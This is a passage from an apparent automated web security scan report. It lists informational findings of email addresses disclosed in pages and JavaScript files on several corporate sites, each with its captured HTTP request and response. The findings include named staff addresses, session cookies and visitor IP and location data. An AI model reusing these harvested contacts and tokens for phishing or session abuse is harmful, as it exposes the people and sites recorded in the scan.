User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=70985859.1555886779.1315345524.1315345524.1315345524.1; __utmb=70985859.1.10.1315345524; __utmc=70985859; __utmz=70985859.1315345524.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Direct%20Beauty%20Product

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:56 GMT
Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7d
Last-Modified: Tue, 17 May 2011 11:55:29 GMT
ETag: "29a4c72-21ef-4dd26231"
Accept-Ranges: bytes
Content-Length: 8687
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Beauty Products Dire
...[SNIP]...
<a href="mailto:info@beautyproductsdirect.com">info@beautyproductsdirect.com</a>
...[SNIP]...

22.35. http://www.covergirl.com/CSS/jqModal.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.covergirl.com
Path:   /CSS/jqModal.css

Issue detail

The following email address was disclosed in the response:

Request

GET /CSS/jqModal.css HTTP/1.1
Host: www.covergirl.com
Proxy-Connection: keep-alive
Referer: http://www.covergirl.com/beauty-products?utm_source=google&utm_medium=cpc&utm_term=%2Bbeauty%20%2Bproducts&utm_campaign=CG+Evergreen+GKW+-+1011+-+BMM&utm_content=s9xEppg8V|7750439198
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=kmi5afnggj2ugc45ntt0nzzx

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Fri, 12 Aug 2011 09:00:23 GMT
Accept-Ranges: bytes
ETag: "802df044ce58cc1:29583"
Server: Microsoft-IIS/6.0
X-Server: EW58
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:45:28 GMT
Content-Length: 3907

/* jqModal base Styling courtesy of;
   Brice Burgess <bhb@iceburg.net> */

/* The Window's CSS z-index value is respected (takes priority). If none is supplied,
   the Window's z-index value will be set
...[SNIP]...

22.36. http://www.covergirl.com/Script/jqModal_mod.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.covergirl.com
Path:   /Script/jqModal_mod.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Script/jqModal_mod.js HTTP/1.1
Host: www.covergirl.com
Proxy-Connection: keep-alive
Referer: http://www.covergirl.com/beauty-products?utm_source=google&utm_medium=cpc&utm_term=%2Bbeauty%20%2Bproducts&utm_campaign=CG+Evergreen+GKW+-+1011+-+BMM&utm_content=s9xEppg8V|7750439198
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=kmi5afnggj2ugc45ntt0nzzx

Response

HTTP/1.1 200 OK
Content-Length: 3382
Content-Type: application/x-javascript
Last-Modified: Tue, 09 Aug 2011 12:19:15 GMT
Accept-Ranges: bytes
ETag: "80a3b98d8e56cc1:29583"
Server: Microsoft-IIS/6.0
X-Server: EW58
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:45:29 GMT

/*
* jqModal - Minimalist Modaling with jQuery
* (http://dev.iceburg.net/jquery/jqModal/)
*
* Copyright (c) 2007,2008 Brice Burgess <bhb@iceburg.net>
* Dual licensed under the MIT and GPL licen
...[SNIP]...

22.37. http://www.covergirl.com/Script/jquery.cookie.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.covergirl.com
Path:   /Script/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Script/jquery.cookie.js HTTP/1.1
Host: www.covergirl.com
Proxy-Connection: keep-alive
Referer: http://www.covergirl.com/beauty-products?utm_source=google&utm_medium=cpc&utm_term=%2Bbeauty%20%2Bproducts&utm_campaign=CG+Evergreen+GKW+-+1011+-+BMM&utm_content=s9xEppg8V|7750439198
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=kmi5afnggj2ugc45ntt0nzzx

Response

HTTP/1.1 200 OK
Content-Length: 4246
Content-Type: application/x-javascript
Last-Modified: Tue, 09 Aug 2011 12:19:15 GMT
Accept-Ranges: bytes
ETag: "80a3b98d8e56cc1:29583"
Server: Microsoft-IIS/6.0
X-Server: EW58
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:45:27 GMT

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

22.38. http://www.covergirl.com/Script/jquery.hoverIntent.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.covergirl.com
Path:   /Script/jquery.hoverIntent.min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Script/jquery.hoverIntent.min.js HTTP/1.1
Host: www.covergirl.com
Proxy-Connection: keep-alive
Referer: http://www.covergirl.com/beauty-products?utm_source=google&utm_medium=cpc&utm_term=%2Bbeauty%20%2Bproducts&utm_campaign=CG+Evergreen+GKW+-+1011+-+BMM&utm_content=s9xEppg8V|7750439198
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=kmi5afnggj2ugc45ntt0nzzx

Response

HTTP/1.1 200 OK
Content-Length: 1609
Content-Type: application/x-javascript
Last-Modified: Tue, 09 Aug 2011 12:19:15 GMT
Accept-Ranges: bytes
ETag: "80a3b98d8e56cc1:29583"
Server: Microsoft-IIS/6.0
X-Server: EW58
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:45:27 GMT

.../**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @par
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

22.39. http://www.csc.com/contact_us

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csc.com
Path:   /contact_us

Issue detail

The following email address was disclosed in the response:

Request

GET /contact_us HTTP/1.1
Host: www.csc.com
Proxy-Connection: keep-alive
Referer: http://www.csc.com/services
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.CSC.Com_HTTP-9000_Pool=1150396288.10275.0000; s_vi=[CS]v1|2733217B8516386C-600001A40000394C[CE]; visitor_info=country%3DUS%26region%3DTX%26city%3DDallas%26latitude%3D32.7825012207031%26longitude%3D-96.8207015991211%26domain%3Dsoftlayer.com%26organization%3DSoftLayer%2BTechnologies%26ip%3D50.23.123.106%26language%3Den-US%26http_user_agent%3DMozilla%252F5.0%2B%2528Windows%2BNT%2B6.1%253B%2BWOW64%2529%2BAppleWebKit%252F535.1%2B%2528KHTML%252C%2Blike%2BGecko%2529%2BChrome%252F13.0.782.220%2BSafari%252F535.1; _session=BAh7BjoPc2Vzc2lvbl9pZCIlZDQ3ZTkwZTY4MTZhNjllNmJiMTU4ZWFkOTk1N2NlYjU%3D--7d3a5af62ef35b69f0a33d9e8e51b9af33cdc6a0; visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26content_id%3D29513%26internal_search%3Dxss%26traffic_source%3Ddirect%2Cdirect%2Creferral%26zone_id%3D509%26content_type_id%3D13%26visits%3D1; subexpandable=-1c; __utma=253059739.694282920.1315342663.1315342663.1315342663.1; __utmb=253059739.3.10.1315342663; __utmc=253059739; __utmz=253059739.1315342663.1.1.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; IPE_S_26841=26841; s_sess=%20ev4%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dcsccom%253D%252526pid%25253DServices%2525253AHome%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.csc.com/contact_us%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:09:11 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 16:01:52 GMT
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 16:09:11 GMT
Vary: Accept-Encoding
Content-Length: 14011
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<a href="mailto:webmaster@csc.com">
...[SNIP]...

22.40. http://www.csc.com/javascripts/public/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csc.com
Path:   /javascripts/public/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /javascripts/public/s_code.js?v=5 HTTP/1.1
Host: www.csc.com
Proxy-Connection: keep-alive
Referer: http://www.csc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.CSC.Com_HTTP-9000_Pool=1150396288.10275.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:57:42 GMT
Server: Apache
Last-Modified: Sun, 28 Aug 2011 01:45:58 GMT
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:57:42 GMT
Vary: Accept-Encoding
Content-Length: 24532
Content-Type: application/javascript

/* SiteCatalyst code version: H.15.1.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************
P
...[SNIP]...
)`i+s.hav()+q+(qs?qs:s.rq(^C)),0,id,ta);qs`h;`Wm('t')`5s.p"
+"_r)s.p_r()}^7(qs);^y`o(@g;`k@g`L^9,`F$51',vb`R@G=^D=s.`N`g=s.`N^K=`E^z^x=s.ppu=^n=^nv1=^nv2=^nv3`h`5$t)`E^z@G=`E^zeo=`E^z`N`g=`E^z`N^K`h`5!id@Us.tc){s.tc=1;s.flush`Z()}`2$h`Atl`0o,t,n,vo`1;s.@G=@uo"
+"`R`N^K=t;s.`N`g=n;s.t(@g}`5pg){`E^zco`0o){`K@J\"_\",1,#8`2@uo)`Awd^zgs`0$P{`K@J$k1,#8`2s.t()`Awd^zdc`0$P{`K@J$k#8`2s.t()}}@2=(`E`I`X`8`4@ss@b0`Rd=^
...[SNIP]...

22.41. http://www.deloitte.com/deloitte-ecm-cm-dpm-web/common/hover/js/jquery.hoverIntent.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.deloitte.com
Path:   /deloitte-ecm-cm-dpm-web/common/hover/js/jquery.hoverIntent.js

Issue detail

The following email address was disclosed in the response:

brian@cherne.net

Request

GET /deloitte-ecm-cm-dpm-web/common/hover/js/jquery.hoverIntent.js HTTP/1.1
Host: www.deloitte.com
Proxy-Connection: keep-alive
Referer: http://www.deloitte.com/view/en_US/us/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww64.deloitte.com=17297418.36895.0000; JSESSIONID=NBNNTmCLThd2pH5RTrs1PgpT2wzvNpyyvTdRJRh8xF2yGQdwy2K9!-647124463

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 23 Jun 2011 09:36:38 GMT
Accept-Ranges: bytes
ETag: "057afc8931cc1:e97"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:56:57 GMT
Content-Length: 4602
Connection: close

/**
* hoverIntent is similar to jQuery's built-in "hover" function except that
* instead of firing the onMouseOver event immediately, hoverIntent checks
* to see if the user's mouse has slowed down (b
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

22.42. http://www.dove.us/Resources/JS/colorbox/jquery.colorbox.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dove.us
Path:   /Resources/JS/colorbox/jquery.colorbox.js

Issue detail

The following email address was disclosed in the response:

jack@colorpowered.com

Request

GET /Resources/JS/colorbox/jquery.colorbox.js HTTP/1.1
Host: www.dove.us
Proxy-Connection: keep-alive
Referer: http://www.dove.us/Products/Hair/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=5jfk3byymtjxyinfzvf23uyi

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Fri, 03 Jun 2011 11:11:03 GMT
Accept-Ranges: bytes
ETag: "a09557edde21cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 25314
Date: Tue, 06 Sep 2011 16:45:43 GMT
Connection: close

// ColorBox v1.3.16 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+
// Copyright (c) 2011 Jack Moore - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function ($, document, window) {
   var
   // ColorBox Default Settings.    
   // See http://colorpowered.com/colorb
...[SNIP]...

22.43. http://www.fekkai.com/js/mootools-1.2.4.2-more.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fekkai.com
Path:   /js/mootools-1.2.4.2-more.js

Issue detail

The following email address was disclosed in the response:

fred@domain.com (an example address inside a form-validation message, not a live contact)

Request

GET /js/mootools-1.2.4.2-more.js HTTP/1.1
Host: www.fekkai.com
Proxy-Connection: keep-alive
Referer: http://www.fekkai.com/?gclid=COTMo_SIiasCFQ6AgwodqEol4A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fekkai_flash_intro_cookie=True

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:37 GMT
Server: Apache
Last-Modified: Thu, 25 Aug 2011 16:09:39 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Length: 126010
Connection: close
Content-Type: application/x-javascript

//MooTools More, <http://mootools.net/more>. Copyright (c) 2006-2009 Aaron Newton <http://clientcide.com/>, Valerio Proietti <http://mad4milk.net> & the MooTools team <http://mootools.net/developers>,
...[SNIP]...
lowed.",dateSuchAs:"Please enter a valid date such as {date}",dateInFormatMDY:'Please enter a valid date such as MM/DD/YYYY (i.e. "12/31/1999")',email:'Please enter a valid email address. For example "fred@domain.com".',url:"Please enter a valid URL such as http://www.google.com.",currencyDollar:"Please enter a valid $ amount. For example $100.00 .",oneRequired:"Please enter something for at least one of these inp
...[SNIP]...

22.44. http://www.fekkai.com/js/multibox/multiBox.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fekkai.com
Path:   /js/multibox/multiBox.js

Issue detail

The following email address was disclosed in the response:

liam_smart@hotmail.com

Request

GET /js/multibox/multiBox.js HTTP/1.1
Host: www.fekkai.com
Proxy-Connection: keep-alive
Referer: http://www.fekkai.com/?gclid=COTMo_SIiasCFQ6AgwodqEol4A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fekkai_flash_intro_cookie=True

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:38 GMT
Server: Apache
Last-Modified: Thu, 25 Aug 2011 16:09:39 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Length: 32264
Connection: close
Content-Type: application/x-javascript

/**************************************************************

   Script        : multiBox
   Version        : 2.0.2
   Authors        : Samuel Birch
   Desc        : Supports jpg, gif, png, flash, flv, mov, wmv, mp3, html, iframe
   Licence        : Open Source MIT Licence
   Modified    : Liam Smart (liam_smart@hotmail.com) - MooTools 1.2 upgrade
   Usage        : window.addEvent('domready', function(){
                    //call multiBox
                    var initMultiBox = new multiBox({
                        mbClass: '.mb',//class you need to add links that
...[SNIP]...

22.45. http://www.fekkai.com/js/multibox/overlay.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fekkai.com
Path:   /js/multibox/overlay.js

Issue detail

The following email address was disclosed in the response:

liam_smart@hotmail.com

Request

GET /js/multibox/overlay.js HTTP/1.1
Host: www.fekkai.com
Proxy-Connection: keep-alive
Referer: http://www.fekkai.com/?gclid=COTMo_SIiasCFQ6AgwodqEol4A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fekkai_flash_intro_cookie=True

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:38 GMT
Server: Apache
Last-Modified: Thu, 25 Aug 2011 16:09:39 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Length: 3030
Connection: close
Content-Type: application/x-javascript

/**************************************************************

   Script        : Overlay
   Version        : 2.0.2
   Authors        : Samuel Birch
   Desc        : Covers the window with a semi-transparent layer.
   Licence        : Open Source MIT Licence
   Modified    : Liam Smart (liam_smart@hotmail.com) - MooTools 1.2 upgrade

**************************************************************/

//start overlay class
var Overlay = new Class({
   
   //implements
   Implements: Options,
   
   //options

...[SNIP]...

22.46. http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/article_view_hnl/1689.php

Issue detail

The following email addresses were disclosed in the response:

robert.mitchell@harbottle.com
dalton.odendaal@harbottle.com
ben.bye@harbottle.com
michael.friend@harbottle.com

Request

GET /hnl/pages/article_view_hnl/1689.php HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:44:41 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 35226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<base href=http:/
...[SNIP]...
<A href="mailto:robert.mitchell@harbottle.com">robert.mitchell@harbottle.com</A>
...[SNIP]...
<A href="mailto:dalton.odendaal@harbottle.com">dalton.odendaal@harbottle.com</A>
...[SNIP]...
<A href="mailto:ben.bye@harbottle.com">ben.bye@harbottle.com</A>
...[SNIP]...
<A href="mailto:michael.friend@harbottle.com">michael.friend@harbottle.com</A>
...[SNIP]...

22.47. http://www.harbottle.com/hnl/pages/pubs/479

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/pubs/479

Issue detail

The following email addresses were disclosed in the response:

mark.owen@harbottle.com
mark.phillips@harbottle.com

Request

GET /hnl/pages/pubs/479 HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:44:45 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 15831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<base href=http:/
...[SNIP]...
<A href="mailto:mark.owen@harbottle.com">
...[SNIP]...
<A href="mailto:mark.phillips@harbottle.com">
...[SNIP]...

22.48. http://www.netsuite.com/portal/javascript/DD_roundies.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netsuite.com
Path:   /portal/javascript/DD_roundies.js

Issue detail

The following email address was disclosed in the response:

drew.diller@gmail.com

Request

GET /portal/javascript/DD_roundies.js HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/products/netsuite/financials/main.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=QT3hTm8p7D1Q2hhMSM3rQLFQvcw2J3TQShKJRpn1Yhv9FTy2DQVng1H0TCB1KJGCkCkpDxH4DCFJNC0Nj2667xXJTjLwhfB8YwwBpTkcx5GNPSrJxnLxrTJMV2nLTVxD!-982923961; NLShopperId=Mhd7aqh5AbdCXidV; NLVisitorId=Mhd7aqh5AbpCXgSl; NS_VER=2011.2.0; mbox=session#1315341135013-154927#1315343327|PC#1315341135013-154927.19#1316551067|check#true#1315341527; bn_u=6923713758307492964; __utma=1.2120471585.1315341469.1315341469.1315341469.1; __utmb=1.2.9.1315341851977; __utmc=1; __utmz=1.1315341469.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fhome.shtml%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315341851979%2C%22u%22%3A%226923713758307492964%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fnetsuite%2Ffinancials%2Fmain.shtml%22%2C%22l%22%3A%22financials%22%2C%22de%22%3A%7B%22su%22%3A%22NetSuite%20is%20the%20leading%20integrated%20web-based%20business%20software%20suite%2C%20including%20business%20accounting%20software%2C%20ERP%20software%2C%20CRM%20software%20and%20ecommerce%20software.%20Effectively%20and%20efficiently%20manage%20all%20of%20your%20key%20business%20operations%20with%20one%20seamless%20business%20software%20solution!%22%2C%22ti%22%3A%22Cloud%20ERP%2C%20Business%20Accounting%20Software%2C%20CRM%2C%20Ecommerce%20%E2%80%94%20NetSuite%22%2C%22nw%22%3A475%2C%22nl%22%3A226%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 16853
Content-Disposition: inline;filename*=utf-8''DD_roundies.js
NS_RTIMER_COMPOSITE: 677907634:73686F702D6A6176613030312E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: application/octet-stream; charset=UTF-8
Cache-Control: max-age=1951
Date: Tue, 06 Sep 2011 15:44:12 GMT
Connection: close

/**
* DD_roundies, this adds rounded-corner CSS in standard browsers and VML sublayers in IE that accomplish a similar appearance when comparing said browsers.
* Author: Drew Diller
* Email: drew.diller@gmail.com
* URL: http://www.dillerdesign.com/experiment/DD_roundies/
* Version: 0.0.2a
* Licensed under the MIT License: http://dillerdesign.com/experiment/DD_roundies/#license
*
* Usage:
* DD_roundies.ad
...[SNIP]...

22.49. http://www.netsuite.com/portal/javascript/jquery.colorbox-min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netsuite.com
Path:   /portal/javascript/jquery.colorbox-min.js

Issue detail

The following email address was disclosed in the response:

jack@colorpowered.com

Request

GET /portal/javascript/jquery.colorbox-min.js HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/home.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=QT3hTm8p7D1Q2hhMSM3rQLFQvcw2J3TQShKJRpn1Yhv9FTy2DQVng1H0TCB1KJGCkCkpDxH4DCFJNC0Nj2667xXJTjLwhfB8YwwBpTkcx5GNPSrJxnLxrTJMV2nLTVxD!-982923961; NLShopperId=Mhd7aqh5AbdCXidV; NLVisitorId=Mhd7aqh5AbpCXgSl; NS_VER=2011.2.0; mbox=session#1315341135013-154927#1315343323|PC#1315341135013-154927.19#1316551063|check#true#1315341523

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 9029
Content-Disposition: inline;filename*=utf-8''jquery.colorbox-min.js
NS_RTIMER_COMPOSITE: 2008136444:73686F702D6A6176613030322E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: max-age=296
Date: Tue, 06 Sep 2011 15:37:46 GMT
Connection: close
Vary: Accept-Encoding

// ColorBox v1.3.9 - a full featured, light-weight, customizable lightbox based on jQuery 1.3
// c) 2009 Jack Moore - www.colorpowered.com - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
